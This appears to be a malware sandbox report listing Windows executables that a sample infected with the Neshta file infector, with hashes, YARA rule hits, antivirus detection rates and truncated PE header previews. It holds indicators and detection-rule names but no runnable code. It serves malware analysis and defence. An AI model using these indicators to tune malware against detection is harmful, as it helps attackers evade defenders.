                                                          SHA-512:850385B0D7ECF20BEC4406D0EFB1AB0A01D9B42E2011FAFC94A8DDB49932FC3B2EB0F6D486903B84D72518928567E96BAE638891F578B9C7CD32C0CEFAC052C4
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.7205787223638
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCA75/gWXq7+8aTaI/dBKvFBvqNm48fnRV2B:sr85CA0a8aTaI/dMrvkL8fnR6
                                                          MD5:29BAF7AE561A3CCC4EF6A6988D57324D
                                                          SHA1:B2D3512E166A5F9E10FAA4E461F6EB5A6B926531
                                                          SHA-256:0B607DF09D9876EC9A80D77B9F2E20267B611A75DA95962FD2DACFF286E00F9F
                                                          SHA-512:A8CF29B616CF505F8A52E0775F0B3859F29A56181F3E1D5B16B86B40FD4E5BA0ECC5DD81098AC1024A32A1CA4575CD9B7F9F6FB2D22C75F808FE32A124065015
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\AutoIt3\Uninstall.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.52588514314363
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCWCrRRPYqa5pic6jXFdL2KiMceCry:sr85CWCrbPA6jXFN2MceCry
                                                          MD5:DF57A3FC85CD6B6CFB31C52714E2D79E
                                                          SHA1:D4DA4DA44C58BB9B818CAF22C7A578FF1EDECF26
                                                          SHA-256:E660F04725795D12A67A796BA9A96889216C2CAE4A6ADA2459F7948428136BC1
                                                          SHA-512:14FBDFFF9E7689A2800A150FB3EB7F50E12A25DEBBC7CF18ADADCDAE925A72DE8E942F5A1AC0023D419C965E2DF9684217D13A95A1AD6C1FF2B61D1B2B814F70
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.484749959894503
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmG7XF7ifrIgo8SPntaYEll7AJ:sr85C3F7iMMSVCm
                                                          MD5:2E784E04B6470C8FDD50399F1ED4FF7E
                                                          SHA1:4B51ACB85DE25350D6331202884C1F405DF8231F
                                                          SHA-256:B43C70781E9BA983C9EB256B24E80D998EFB3FEC878FF193C9D11709B89A9040
                                                          SHA-512:2DDB9B10A7514FC5844FDAF47CB0647F020B4359AAC105415F2A143A336AE194124C903A547FBD8C7FE73B596EBB79F958EA84F867CB326FBF203902B63EA67F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4710468077094445
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCmGDLaAcF7u9nAlRPL/a9L:sr85C3+u9n8T/aZ
                                                          MD5:AAB384021CCD99B08F91D550581310EA
                                                          SHA1:16DE7D37E9B8312551F1EAB96FCAC0CBBA73A166
                                                          SHA-256:3626F66835F8FD11C6515E55E9CC7B6DA710FFCA9101632CBB69D2F7D2390E71
                                                          SHA-512:D56589D12F983FF96FE8FF4B9AC4FF0CAD531036272308BB2A2CD4A101D7998005397E8FE50A9E4D3B1EC3E203908DC4EE5071545A844BBB497CF6FE67E0B020
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.426705359459557
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJChNBfkv2pymXndR1wF3u20:sr85Chi3m3pwF+20
                                                          MD5:84E45C930A79BBB3239D4929503FC38C
                                                          SHA1:2AED49DEAF2CF13CFAEA97FE5CF217A01E4BD08A
                                                          SHA-256:CAC1AE6F9B9623E171517C8AE1609A8E21626D9FBF3EE400325E371ACE843444
                                                          SHA-512:7AFA1BF9237E28AA97918E9806A045A565154599C4DD0882C8B106D25E5410EFCCBDCD01015E156B724009F2A884CA5E1D43C398453769BF9B3021195C6D3FA8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.599158686971261
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCKhp8N3YERomt8JCeToWZmKbt1H0jKWo:sr85CKn8N3YEuTofE1H0jKWo
                                                          MD5:294D120414736A7579445CCCA78F505C
                                                          SHA1:4DC265A2FC75AF686DA3EC830BF9C0072AF14581
                                                          SHA-256:AF7E482890D77DAD13F0D5A1377DEFA83CF2D802DC1444A69FD17A464C4A446C
                                                          SHA-512:8DC9F174875DD7012030EC6FE1624AAA99E068DD464BE4AEFDBA9699C39969DF0E52214B90BC46ACE204D2505DDD69C46D674DE39A6BFAA3DE213DFCA66ED196
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.6085003171859364
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKN/MZzagYK5o2IQJ/rVSgvV:sr85C/qA/WadUDFBZz9
                                                          MD5:89DC2A4E5290AE1297C2281B5CD35068
                                                          SHA1:1D091812669D1D0CF0293B9D495599BF257434D9
                                                          SHA-256:5116F46AD2BE5B402FAD8B89350F671576D995ECCF91863D827984AE42319596
                                                          SHA-512:2CECAFADFE911CAEF8F735192F7F1D60305BBBA6A390E13CDB4B5055413D931B75F276086F18AE36E32FEF31DD3B37FDDECD1FDB9F4EC12938B1EFABCD6D7E07
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.62851477500423
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCsrkFN/GjcAShJITZOG8i4e53hS5PobC:sr85Csk0cA6JITt8cXbC
                                                          MD5:61694544EA704A28532F4EC0319AC735
                                                          SHA1:F6ED53FF2792797D40ECA888567873F0570698E6
                                                          SHA-256:4183F6849773F9EED9279D5237C93719511F605276F0EB9BF2E8B2258BBAED09
                                                          SHA-512:5004069D9A41811B63CD84A049757A2F2CB061D1D6999FAE9EC083C4AE3C850BAD9D59112B452118A0AA231A4F07145D03C62FDB699074F4610D4899A662C922
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.653521772684421
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                          MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                          SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                          SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                          SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Joe Security
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.656070779362061
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                          MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                          SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                          SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                          SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Joe Security
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.6397427450636055
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                          MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                          SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                          SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                          SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Joe Security
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.529062771218018
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCPQ5vyh0tYhgw2azkO8rn85GF:sr85CPQ5vyhvcOQn2GF
                                                          MD5:2FECE9074EC51CAA91DDEA7FBB4FFC54
                                                          SHA1:35BD848191A5C14897883B9A11BECC6DB522A88F
                                                          SHA-256:B4D954F33DDFC952FDD208E3EFFCD6A1E442DE8D07C9148C4771986F781C294F
                                                          SHA-512:F9C3249A39CB4206E495EED2A5C6130CCB04874FBFCB9D0D3D854B6625791E88C2BF29A7AE6C5E57B2B5C4EF25F39AA7BAA4B8C989A3A62D9FCFAF9116417AEB
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.4112170834310565
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCUN8aliPc8ZbyHVftptXvVWi6N8rKca:sr85CU6i/XtXv7+8rKca
                                                          MD5:BA5A5D15C15E1143A35B5ACB9DA43F23
                                                          SHA1:BE948D6A40AE1221B2E093B6634D695EEDFAD323
                                                          SHA-256:075242C15AEF5CC590E716651ED3F1F53A8BD23A37CFA60F827DBE60B7DA8918
                                                          SHA-512:3E36FA618DF02872C1F5043318A8F945912FC5162F8C9ECE7FDA323F7D8AFD53157C00519E50DA9899DA6BF3117CA82011757B987726F968C3B7B5A632066EDA
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.374994892226591
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCrNsxigdJqueeYUOc1wxNXI:sr85CCnneeVV1
                                                          MD5:BED5A0265D4F2739606BD0C79DB41BDB
                                                          SHA1:0EAE9CA564CC3B83B4B7CAAF64FED47567C8A6D1
                                                          SHA-256:713E2E20A467272CF5E174DFF81954001170C7F92143A5F34C2FFAE9B85BDC04
                                                          SHA-512:FAD8C0A7ED8FBCC7BC9704522B2A35C2BCEA68DE3A614009D49DE7F8C8B35F06DA12E5DA78EF8E96FF72983C33268046521C190C0BD0F8A644887A65DA44B2B8
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.305732261424221
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCWdVJe84MtsqXZhbkALEwcyj3Y:sr85CKVYpqeyDY
                                                          MD5:3A6E83146F925E67FD9BD350F823858C
                                                          SHA1:030EF0512034AE6FFA06C7B42041252A56613799
                                                          SHA-256:494DC48B1892964FB6D5CBB19DACBE990434EED9DEE1BD64D9E74D14681717F3
                                                          SHA-512:F06ABB303461C6F016470C343DBDACB154C2575095B67B0A2620DBF6E7F799BEC18A6F5E3C678DB107F98764701DE33C75C1E6FC08ADD22FF6D486164DC17336
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.375840229458048
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCUK78LyRHC/T5ICzzKgHiTs33fSQ19uk:sr85CUdGS2gHN3aQ1p
                                                          MD5:8D7C662937FFE3C3AA129DD3BA7B887F
                                                          SHA1:F67F3B5C32BF6CC3DEA744DAAB16177DD86DBFF6
                                                          SHA-256:656ED573131580248ACC968FABBA2197657EAEE8DD6D0BA533A50DD34E74B603
                                                          SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
